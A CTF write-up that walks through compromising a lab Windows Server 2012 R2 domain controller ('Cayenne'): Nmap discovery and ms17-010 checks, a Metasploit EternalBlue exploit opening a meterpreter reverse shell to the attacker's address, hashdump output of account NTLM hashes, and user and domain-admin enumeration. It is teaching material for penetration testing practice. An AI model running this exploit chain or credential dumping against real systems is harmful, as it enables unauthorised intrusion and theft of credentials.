In the previous article, we found the ransomware key, and now we are on the hunt for the Windows AD domain controller to decrypt the research data, which also contains the flag. In this article, we will concentrate on the host named Cayenne.
Discovery
Since we already performed host discovery, we do not need to do it again. However, we need to figure out which ones are Windows-based hosts out of the three left. The quickest way to figure out if a host is running Windows is by pinging, as you can see below.
andrew@kali:~$ ping -c 1 172.20.20.24 | grep ttl; ping -c 1 172.20.20.35 | grep ttl; ping -c 1 172.20.20.37 | grep ttl 64 bytes from 172.20.20.24: icmp_seq=1 ttl=63 time=17.31 ms 64 bytes from 172.20.20.35: icmp_seq=1 ttl=127 time=23.7 ms 64 bytes from 172.20.20.37: icmp_seq=1 ttl=127 time=20.76 ms
Nping
Alternatively, we can use the Nping, an open-source tool for network packet generation, response analysis, and response time measurement. It is part of the Nmap suite and should be in the default installation of Kali Linux.
andrew@kali:~$ sudo nping 172.20.20.22 172.20.20.24 172.20.20.35 172.20.20.37 --icmp -c 1 | grep reply RCVD (1.0066s) ICMP [172.20.20.24 > 10.10.10.2 Echo reply (type=0/code=0) id=35881 seq=1] IP [ttl=63 id=46377 iplen=28 ] RCVD (2.0085s) ICMP [172.20.20.35 > 10.10.10.2 Echo reply (type=0/code=0) id=512 seq=1] IP [ttl=127 id=9127 iplen=28 ] RCVD (3.0112s) ICMP [172.20.20.37 > 10.10.10.2 Echo reply (type=0/code=0) id=29653 seq=1] IP [ttl=127 id=16002 iplen=28 ]
Both commands provided us with similar information. You might be wondering what we are examining here. We are focusing on the TTL (time to live) value. Operating systems have different default TTL values. The majority of Linux-based OS use 64 as the default TTL value. On the other hand, Microsoft has used the TTL value of 128 for more than 20 years.
As you may have noticed, the ping and Nping results showed us a value of 63 and 127. You might be wondering why it is giving us a lower value than the default. When a packet needs to go through a router or firewall, it will subtract one count from the TTL value.
Port scanning
While it is likely that the last two hosts on our list are Windows, we still need to perform a scan to verify. As demonstrated in the first article of the Kaos Corp series, we will use Nmap for the port scan, OS detection, etc.
nmap -A 172.20.20.35 172.20.20.37
andrew@kali:~$ sudo nmap -A 172.20.20.35 172.20.20.37 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 18:55 PST Nmap scan report for 172.20.20.35 Host is up (0.0059s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: SCOVILLE) 1025/tcp open msrpc Microsoft Windows RPC 1026/tcp open msrpc Microsoft Windows RPC 1027/tcp open msrpc Microsoft Windows RPC 1036/tcp open msrpc Microsoft Windows RPC 1045/tcp open msrpc Microsoft Windows RPC 1060/tcp open msrpc Microsoft Windows RPC 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 5901/tcp open vnc VNC (protocol 3.8) | vnc-info: | Protocol version: 3.8 | Security types: | None (1) | Tight (16) | Tight auth subtypes: | None |_ WARNING: Server does not require authentication 8888/tcp open bindshell Microsoft Windows 6.1.7601 cmd.exe (**BACKDOOR**) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=12/2%OT=135%CT=1%CU=40101%PV=Y%DS=2%DC=T%G=Y%TM=61A987 OS:C2%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=7)OP OS:S(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW OS:8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)EC OS:N(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F= OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD OS:=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops Service Info: Host: ANAHEIM; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 9h45m27s, deviation: 4h37m08s, median: 7h05m26s |_nbstat: NetBIOS name: ANAHEIM, NetBIOS user:, NetBIOS MAC: 26:e3:1a:66:90:93 (unknown) | smb-os-discovery: | OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1 | Computer name: anaheim | NetBIOS computer name: ANAHEIM\x00 | Domain name: scoville.local | Forest name: scoville.local | FQDN: anaheim.scoville.local |_ System time: 2021-12-12T02:03:21-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-12-12T10:03:22 |_ start_date: 2021-09-22T07:29:37 TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 7.82 ms vyos-r1.networkjutsu.com (10.10.10.1) 2 17.08 ms 172.20.20.35 Nmap scan report for 172.20.20.37 Host is up (0.0055s latency). Not shown: 973 closed ports PORT STATE SERVICE VERSION 7/tcp open echo 9/tcp open discard? 13/tcp open daytime Microsoft Windows USA daytime 17/tcp open qotd Windows qotd (English) 19/tcp open chargen 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Site doesn't have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-12 10:00:38Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scoville.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: SCOVILLE) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scoville.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ssl/ms-wbt-server? | rdp-ntlm-info: | Target_Name: SCOVILLE | NetBIOS_Domain_Name: SCOVILLE | NetBIOS_Computer_Name: CAYENNE | DNS_Domain_Name: scoville.local | DNS_Computer_Name: cayenne.scoville.local | DNS_Tree_Name: scoville.local | Product_Version: 6.3.9600 |_ System_Time: 2021-12-12T10:03:21+00:00 | ssl-cert: Subject: commonName=cayenne.scoville.local | Not valid before: 2021-09-21T05:35:58 |_Not valid after: 2022-03-23T05:35:58 |_ssl-date: 2021-12-12T10:03:36+00:00; +7h05m27s from scanner time. 6000/tcp open ftp FileZilla ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 domain | drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 staging | drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 staging areas |_drwxr-xr-x 1 ftp ftp 0 Sep 24 2020 sysvol |_ftp-bounce: bounce working! | ftp-syst: |_ SYST: UNIX emulated by FileZilla 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=12/2%OT=7%CT=1%CU=40250%PV=Y%DS=2%DC=T%G=Y%TM=61A987C2 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=I%II=I%SS=S%TS=7)OPS(O OS:1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST OS:11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R OS:=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS% OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0% OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK OS:=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops Service Info: Host: CAYENNE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 8h41m26s, deviation: 3h34m39s, median: 7h05m26s |_nbstat: NetBIOS name: CAYENNE, NetBIOS user: , NetBIOS MAC: 8e:e8:2a:68:89:c5 (unknown) | smb-os-discovery: | OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3) | OS CPE: cpe:/o:microsoft:windows_server_2012::- | Computer name: cayenne | NetBIOS computer name: CAYENNE\x00 | Domain name: scoville.local | Forest name: scoville.local | FQDN: cayenne.scoville.local |_ System time: 2021-12-12T02:03:21-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-12-12T10:03:21 |_ start_date: 2021-09-22T07:27:37 TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS - Hop 1 is the same as for 172.20.20.35 2 7.00 ms 172.20.20.37 Post-scan script results: | clock-skew: | 9h45m27s: | 172.20.20.35 |_ 172.20.20.37 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 186.73 seconds
Our Nmap results confirmed that both hosts are running Windows. Moreover, we now know the domain controller’s Windows version and its IP address.
More scanning
Since the domain controller is running an older version of the Windows Server, we can use Nmap again to run script scans to identify its vulnerability.
SMB (Server Message Block) has had many security vulnerabilities. That said, we should check which SMB versions are enabled. We can easily do that using Nmap script scan, as shown below.
nmap 172.20.20.37 -p 445 –script=smb-protocols
andrew@kali:~$ nmap 172.20.20.37 -p 445 --script=smb-protocols Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 20:15 PST Nmap scan report for 172.20.20.37 Host is up (0.0055s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-protocols: | dialects: | NT LM 0.12 (SMBv1) [dangerous, but default] | 2.02 | 2.10 | 3.00 |_ 3.02 Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Now that we know the SMB version, we can use ExploitDB to hunt for SMB vulnerabilities. In this example, I used the SMB term in my search. Additionally, I ticked the verified check box to limit our results.

By skimming through the results, we can see that EternalBlue is there. Many IT professionals have heard of this exploit and will probably recognize the name. However, IT folks who are not in system admin or security roles may not associate it with SMBv1 vulnerability, so it may not be evident.
Now that we have one vulnerability we can test, let’s use Nmap again to verify that we can exploit this.
nmap 172.20.20.37 -p 445 –script smb-vuln-ms17-010
andrew@kali:~$ nmap 172.20.20.37 -p 445 --script smb-vuln-ms17-010 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-13 19:56 PST Nmap scan report for 172.20.20.37 Host is up (0.0026s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Our Nmap results confirmed that the Windows domain controller is vulnerable to EternalBlue, also known as MS17-010. Now, let’s see if we can use Metasploit to exploit the vulnerability.
Exploitation
As mentioned in my previous article, I did not know how to use Metasploit at the time of the CTF event. But, I started learning how to use it during the event because of this Cayenne host.
Related: Kaos Corp: Habanero |
To start using Metasploit, we need to launch it. I typically use the msfconsole -q
command to do this. The -q
option disables the banner display. Depending on your Kali version, you may need to start the database first by issuing the msfdb start
command.
andrew@kali:~$ msfconsole -q msf6 >
Searching for exploit
Once you see the msf6
prompt, use the search function. Here is an example of me searching for the EternalBlue exploit.
msf6 > search type:exploit ms17-010
msf6 > search type:exploit ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce
Alternatively, we can use eternalblue as the keyword. It displays the same results.
msf6> search type:exploit eternalblue
msf6 > search type:exploit eternalblue Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce
A simple way to search is by typing search and keyword, as shown below. As you can see, this command displayed all modules that matched our keyword. Previously, I instructed Metasploit to show only those in the exploit modules.
msf6 > search eternalblue
msf6 > search eternalblue Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Using the exploit
The exploit module that most likely would work is the ms17_010_eternalblue from the list, which is the first one. To read something about this exploit module, let's issue the info
command, as shown below.
msf6 > info 0
msf6 > info 0 Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Module: exploit/windows/smb/ms17_010_eternalblue Platform: Windows Arch: x64 Privileged: Yes License: Metasploit Framework License (BSD) Rank: Average Disclosed: 2017-03-14 Provided by: Equation Group Shadow Brokers sleepya Sean DillonDylan Davis thelightcosine wvu agalway-r7 cdelafuente-r7 cdelafuente-r7 agalway-r7 Available targets: Id Name -- ---- 0 Automatic Target 1 Windows 7 2 Windows Embedded Standard 7 3 Windows Server 2008 R2 4 Windows 8 5 Windows 8.1 6 Windows Server 2012 7 Windows 10 Pro 8 Windows 10 Enterprise Evaluation Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wi ki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Win dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin es. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 20 08 R2, Windows 7, Windows Embedded Standard 7 target machines. Payload information: Space: 2000 Description: This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads. References: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010 https://nvd.nist.gov/vuln/detail/CVE-2017-0143 https://nvd.nist.gov/vuln/detail/CVE-2017-0144 https://nvd.nist.gov/vuln/detail/CVE-2017-0145 https://nvd.nist.gov/vuln/detail/CVE-2017-0146 https://nvd.nist.gov/vuln/detail/CVE-2017-0147 https://nvd.nist.gov/vuln/detail/CVE-2017-0148 https://github.com/RiskSense-Ops/MS17-010 https://www.exploit-db.com/exploits/42030 Also known as: ETERNALBLUE
Upon reading the information, it looks like this is the perfect exploit module for this Windows domain controller. Let's go ahead and use it by issuing the command below.
msf6 > use 0 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) >
Before we can run the exploit, we need to modify the settings. Exploit modules have different options. However, there are some common ones like RHOST
, RPORT
, LPORT
, and LHOST
. Since we do not know the options available for this exploit module, let's find that out using the command as shown below.
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
msf6 exploit(windows/smb/ms17_010_eternalblue) > options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/w iki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Wi ndows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach ines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Window s Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines . VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2 008 R2, Windows 7, Windows Embedded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.8.229 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target
Alternatively, we can issue show options
to display the same output.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/w iki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Wi ndows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach ines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Window s Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines . VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2 008 R2, Windows 7, Windows Embedded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.8.229 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target
Before we run the exploit module, we need to make some changes. In this case, at a minimum, we need to change the RHOST and LHOST options for this exploit to run successfully.
The RHOST is our target computer's IP address. In this case, we will set it to 172.20.20.37. The LHOST is our computer's IP address. In this case, our VPN IP address is 10.10.10.2. To change the settings, issue the commands as shown below.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.20.20.37 rhost => 172.20.20.37 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.10.2 lhost => 10.10.10.2
We are now ready to run the exploit module. To run the exploit module, we need to issue the command as shown below.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 10.10.10.2:4444 [*] 172.20.20.37:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 172.20.20.37:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit) [*] 172.20.20.37:445 - Scanned 1 of 1 hosts (100% complete) [+] 172.20.20.37:445 - The target is vulnerable. [*] 172.20.20.37:445 - shellcode size: 1283 [*] 172.20.20.37:445 - numGroomConn: 12 [*] 172.20.20.37:445 - Target OS: Windows Server 2012 R2 Standard 9600 [+] 172.20.20.37:445 - got good NT Trans response [+] 172.20.20.37:445 - got good NT Trans response [+] 172.20.20.37:445 - SMB1 session setup allocate nonpaged pool success [+] 172.20.20.37:445 - SMB1 session setup allocate nonpaged pool success [+] 172.20.20.37:445 - good response status for nx: INVALID_PARAMETER [+] 172.20.20.37:445 - good response status for nx: INVALID_PARAMETER [*] Sending stage (200262 bytes) to 172.20.20.37 [*] Meterpreter session 1 opened (10.10.10.2:4444 -> 172.20.20.37:51316 ) at 2021-12-13 23:21:10 -0800 meterpreter >
Meterpreter shell
Since we see the meterpreter
prompt, that means the module successfully exploited the EternalBlue vulnerability.
Note
You may need to issue run a few times to get the Meterpreter shell.
There are many commands that you can issue in the Meterpreter shell. If you are unfamiliar with it, you can enter the question mark key and hit the Enter key to view the help menu.
meterpreter > ?
meterpreter > ? Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel detach Detach the meterpreter session (for http/https) disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session ssl_verify Modify the SSL certificate verification setting transport Manage the transport mechanisms use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination del Delete the specified file dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files show_mount List all mount points/logical drives upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- arp Display the host ARP cache getproxy Display the current proxy configuration ifconfig Display interfaces ipconfig Display interfaces netstat Display the network connections portfwd Forward a local port to a remote service resolve Resolve a set of host names on the target route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getsid Get the SID of the user that the server is running as getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process suspend Suspends or resumes a list of processes sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyboard_send Send keystrokes keyevent Send key events keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes mouse Send mouse events screenshare Watch the remote user desktop in real time screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Stdapi: Audio Output Commands ============================= Command Description ------- ----------- play play a waveform audio file (.wav) on the target system Priv: Elevate Commands ====================== Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system. Priv: Password database Commands ================================ Command Description ------- ----------- hashdump Dumps the contents of the SAM database Priv: Timestomp Commands ======================== Command Description ------- ----------- timestomp Manipulate file MACE attributes
Since this was a CTF, time is of the essence. Hence, I decided to find a way to get to the command shell as soon as possible. That said, I issued the shell command right away to explore.
meterpreter > shell
meterpreter > shell Process 4300 created. Channel 1 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>
Typically, the first command I run after getting a shell using Meterpreter is the whoami
command.
Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system
In this case, we have a system account, which means we have the highest privilege level. Since I needed a way to access the desktop environment, this is a perfect access level.
User enumeration
During the CTF, my first instinct was to get a user account that had administrator-level access. That said, I decided to enumerate the users. There are two ways that I know of to get a list of user accounts in this scenario.
Meterpreter shell
As previously mentioned, I did not know how to use Metasploit back then, so I did not use this method during the event. But, after taking the Penetration Testing Student and passing the eJPT exam, I know more now to share this with you.
To enumerate the users on this Windows machine, we can issue the hashdump
command while still in the Meterpreter shell. It also displays the users' password hashes that we can try to crack.
meterpreter > hashdump
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bc5cd4292afb61d1ffe517a2637860ad::: summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f::: darcy.roman:1113:aad3b435b51404eeaad3b435b51404ee:d33b15ba0f27dbf0fd56cd54b1db1ade::: troy.yates:1114:aad3b435b51404eeaad3b435b51404ee:e08847c1090227cb3a9ad59893094b32::: eve.barr:1115:aad3b435b51404eeaad3b435b51404ee:9a1bece5360ef81d379470d065f95562::: max.clark:1116:aad3b435b51404eeaad3b435b51404ee:308c4a9a9120c711cfb117ec019e1a9a::: sally.bird:1117:aad3b435b51404eeaad3b435b51404ee:77a7ad444bf629952a9dc8cc2adcf0e5::: jessy.rogers:1118:aad3b435b51404eeaad3b435b51404ee:83ccff469a423cb19d391a5fd0b61c28::: yoder.mullins:1119:aad3b435b51404eeaad3b435b51404ee:4fc7ba2babad8553ef6bf7f9f706b128::: jace.le:1120:aad3b435b51404eeaad3b435b51404ee:38597e7e9feaeefd8135f9bc981b7499::: fern.scott:1121:aad3b435b51404eeaad3b435b51404ee:61cedcc6b3f7104ded374fd8fb29b0a4::: admin.local:1122:aad3b435b51404eeaad3b435b51404ee:699b68000f83d0ce2070a7d3868bee59::: CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0::: ANAHEIM$:1123:aad3b435b51404eeaad3b435b51404ee:96e684520b474d918ca28f96f22e9337:::
Command shell
Alternatively, we can enumerate users by using the command shell. During the CTF, this was the method I used to display usernames on this Windows domain controller.
We can issue the net user
command to display a list of usernames available on this host.
C:\Windows\system32>net user
C:\Windows\system32>net user net user User accounts for \\ ------------------------------------------------------------------------------- admin.local Administrator darcy.roman eve.barr fern.scott Guest jace.le jessy.rogers krbtgt max.clark sally.bird summer.sloan troy.yates yoder.mullins The command completed with one or more errors.
While it accomplishes our task, the better one is the net group "domain admins"
command. That is because I wanted to get a domain account with administrator privileges.
C:\Windows\system32>net group "domain admins"
